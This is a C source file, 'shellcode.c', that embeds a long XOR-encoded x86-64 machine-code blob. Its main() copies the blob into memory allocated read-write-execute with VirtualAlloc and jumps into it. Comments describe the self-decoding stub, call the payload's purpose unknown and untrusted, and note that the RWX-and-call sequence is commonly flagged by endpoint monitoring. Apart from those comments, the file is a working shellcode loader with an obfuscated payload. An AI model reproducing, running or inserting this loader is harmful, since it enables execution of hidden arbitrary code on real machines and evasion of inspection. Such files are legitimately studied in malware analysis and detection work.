shellcode.c
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>
/*
 * Opaque x86-64 machine-code blob that main() copies into executable memory
 * and then calls.
 *
 * The leading 39 bytes appear to disassemble to a short loop that XORs the
 * data following it in place, eight bytes per iteration, using a 64-bit key
 * embedded in the stub. Everything after the stub is therefore stored encoded,
 * and what it does once decoded cannot be read from this listing.
 * NOTE(review): nothing in this file states the payload's purpose or origin;
 * treat the blob as untrusted and examine it only in an isolated analysis
 * environment.
 *
 * The initializer is a string literal, so sizeof(code) also counts the
 * terminating NUL the compiler appends after the last listed byte.
 */
unsigned char code[] =
"\x48\x31\xc9\x48\x81\xe9\xa7\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xa5\xf6\x35\xbe\xad\x67\x1a\x0d\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x59\xbe\xb6\x5a\x5d\x8f"
"\xda\x0d\xa5\xf6\x74\xef\xec\x37\x48\x5c\xf3\xbe\x04\x6c\xc8"
"\x2f\x91\x5f\xc5\xbe\xbe\xec\xb5\x2f\x91\x5f\x85\xbe\xbe\xcc"
"\xfd\x2f\x15\xba\xef\xbc\x78\x8f\x64\x2f\x2b\xcd\x09\xca\x54"
"\xc2\xaf\x4b\x3a\x4c\x64\x3f\x38\xff\xac\xa6\xf8\xe0\xf7\xb7"
"\x64\xf6\x26\x35\x3a\x86\xe7\xca\x7d\xbf\x7d\xec\x9a\x85\xa5"
"\xf6\x35\xf6\x28\xa7\x6e\x6a\xed\xf7\xe5\xee\x26\x2f\x02\x49"
"\x2e\xb6\x15\xf7\xac\xb7\xf9\x5b\xed\x09\xfc\xff\x26\x53\x92"
"\x45\xa4\x20\x78\x8f\x64\x2f\x2b\xcd\x09\xb7\xf4\x77\xa0\x26"
"\x1b\xcc\x9d\x16\x40\x4f\xe1\x64\x56\x29\xad\xb3\x0c\x6f\xd8"
"\xbf\x42\x49\x2e\xb6\x11\xf7\xac\xb7\x7c\x4c\x2e\xfa\x7d\xfa"
"\x26\x27\x06\x44\xa4\x26\x74\x35\xa9\xef\x52\x0c\x75\xb7\x6d"
"\xff\xf5\x39\x43\x57\xe4\xae\x74\xe7\xec\x3d\x52\x8e\x49\xd6"
"\x74\xec\x52\x87\x42\x4c\xfc\xac\x7d\x35\xbf\x8e\x4d\xf2\x5a"
"\x09\x68\xf6\x17\x66\x1a\x0d\xa5\xf6\x35\xbe\xad\x2f\x97\x80"
"\xa4\xf7\x35\xbe\xec\xdd\x2b\x86\xca\x71\xca\x6b\x16\x97\xaf"
"\xaf\xf3\xb7\x8f\x18\x38\xda\x87\xf2\x70\xbe\xb6\x7a\x85\x5b"
"\x1c\x71\xaf\x76\xce\x5e\xd8\x62\xa1\x4a\xb6\x84\x5a\xd4\xad"
"\x3e\x5b\x84\x7f\x09\xe0\xce\xc2\x10\x7f\x7f\xd6\x9e\x50\xd2"
"\xc1\x49\x7f\x75\xc0\xd6\x7b\xdb\xda\x4a\x53\x79\xc0\x9b\x15"
"\x93\xfd\x06\x6e\x65\x85\xd1\x56\x84\xf1\x40\x3a\x20\xeb\x97"
"\x58\xdb\x8d\x40\x6a\x68\xd7\x85\x5c\xcd\xd9\x02\x74\x6e\xc0"
"\xd8\x41\xc6\xd9\x40\x3a\x20\xe3\x99\x47\xdd\xc8\x5c\x3a\x4c"
"\xc1\x92\x18\xfd\xc2\x09\x6e\x68\xcb\x82\x15\x93\xfd\x06\x6e"
"\x65\x85\xd1\x56\x84\xf1\x17\x7f\x7f\xd6\x9f\x46\xca\xc8\x09"
"\x79\x68\x8b\x82\x4d\xca\x8a\x47\x37\x5b\xc4\x9a\x40\xdb\x8d"
"\x40\x69\x79\xc4\x84\x41\x9e\xce\x5d\x46\x7d\xc0\x84\x46\xd7"
"\xde\x13\x7f\x63\xc6\x93\x1b\xdb\xd5\x02\x3d\x36\x85\xb7\x51"
"\xda\x80\x24\x75\x63\xd1\x93\x5b\xca\x8d\x4a\x4a\x6c\xd1\x9e"
"\x15\x99\xee\x5d\x46\x7d\xc0\x84\x46\xd7\xde\x13\x7f\x63\xc6"
"\x93\x1b\xca\xd5\x13\x3d\x2d\x88\xa0\x54\xd2\xd8\x02\x3a\x2a"
"\xd6\x82\x54\xcc\xd9\x47\x74\x62\xd1\x93\x45\xdf\xc9\x49\x7f"
"\x75\xc0\xd6\x10\x8f\x8a\x5c\x3a\x5f\xc0\x98\x54\xd3\xc8\x4a"
"\x53\x79\xc0\x9b\x15\x93\xfd\x06\x6e\x65\x85\xd1\x56\x84\xf1"
"\x17\x7f\x7f\xd6\x9f\x46\xca\xc8\x09\x79\x68\x8b\x82\x4d\xca"
"\x8a\x47\x37\x43\xc0\x81\x7b\xdf\xc0\x02\x3a\x2a\xd5\x93\x47"
"\xcd\xc4\x14\x6e\x68\xcb\x95\x50\x90\xce\x0a\x7e\x2a\x9e\xd6"
"\x7b\xdb\xda\x4a\x4a\x5e\xe1\x84\x5c\xc8\xc8\x47\x37\x43\xc4"
"\x9b\x50\x9e\xe5\x2c\x59\x5f\x85\xdb\x65\xed\xfd\x15\x75\x7b"
"\xcc\x92\x50\xcc\x8d\x35\x7f\x6a\xcc\x85\x41\xcc\xd4\x47\x37"
"\x5f\xca\x99\x41\x9e\xe5\x2c\x5f\x54\xfa\xb5\x79\xff\xfe\x34"
"\x5f\x5e\xfa\xa4\x7a\xf1\xf9\x5c\x3a\x43\xc0\x81\x18\xf7\xd9"
"\x02\x77\x2d\x88\xa6\x54\xca\xc5\x47\x3d\x45\xee\xb5\x67\x84"
"\xf1\x13\x62\x79\xc3\x9f\x59\xdb\xf1\x14\x72\x68\xc9\x9a\x69"
"\xd1\xdd\x02\x74\x2a\x85\xdb\x7b\xdf\xc0\x02\x3a\x2a\xc6\x99"
"\x58\xd3\xcc\x09\x7e\x2a\x85\xdb\x63\xdf\xc1\x12\x7f\x2d\x82"
"\x95\x0f\xe2\xdd\x02\x68\x7e\xcc\x85\x41\xdb\xc3\x04\x7f\x23"
"\xc6\x9b\x51\x9e\x88\x56\x3d\x2d\x88\xb0\x5a\xcc\xce\x02\x21"
"\x0d";
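/*
 * Copies the code[] blob into newly allocated memory and transfers control
 * to it through a function-pointer cast.
 *
 * Returns EXIT_FAILURE if the allocation fails; otherwise returns 0 if and
 * when the called blob returns to this function.
 */
int main(void)
{
    /*
     * The region is requested writable and executable at the same time.
     * An RWX allocation followed by a copy and an indirect call into the
     * same region is a sequence that memory-protection policies and
     * endpoint monitoring commonly flag.
     */
    void *exec = VirtualAlloc(0, sizeof(code), MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    /* VirtualAlloc returns NULL on failure; the copy below would then write through a null pointer. */
    if (exec == NULL) {
        fprintf(stderr, "VirtualAlloc failed: %lu\n", (unsigned long)GetLastError());
        return EXIT_FAILURE;
    }

    /* sizeof(code) includes the string literal's terminating NUL. */
    memcpy(exec, code, sizeof(code));

    /* Control leaves compiled code here; nothing in this file constrains what the blob does. */
    ((void(*)())exec)();
    return 0;
}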